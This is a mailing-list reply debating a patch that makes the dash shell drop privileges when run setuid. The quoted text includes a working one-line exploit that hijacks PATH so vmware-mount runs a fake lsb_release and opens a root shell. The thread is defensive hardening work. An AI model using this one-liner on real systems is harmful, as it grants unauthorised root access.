Re: [PATCH] implement privmode support in dash

[Tavis Ormandy <taviso () cmpxchg8b com>]

Simon McVittie <smcv () debian org> wrote:

> On 22/08/13 18:59, Tavis Ormandy wrote:
> > For example, here is one I just found in vmware-tools that manages to
> > call popen("lsb_release") with effective uid zero:
> >
> > $ cc -xc - -olsb_release<<<'main(){system("sh>`tty`
> > 2>&1");}';PATH=.:$PATH vmware-mount # whoami root
>
> Having (da)sh drop privileges is a useful bit of hardening, but it doesn't
> help you if the vulnerable executable does a fork-and-exec without using
> the shell (at least with one of the exec variants that respects $PATH,
> like execvp), or some more friendly wrapper around fork-and-exec like
> posix_spawnp() or GLib's g_spawn family of functions.

Sure, but we shouldn't let the perfect be the enemy of the good.
-fstack-protector doesn't magically make anything safe, but it's still a
useful mitigation tool that we would be worse off without.

We can't produce a patch that makes every crazy thing someone might want to
do while setuid safe, but this is a common pattern that Debian-derived
distributions lag behind on. I guarantee it will save you a few CVE's over
the next few years :)

Tavis.


-- 
-------------------------------------
taviso () cmpxchg8b com | pgp encrypted mail preferred
-------------------------------------------------------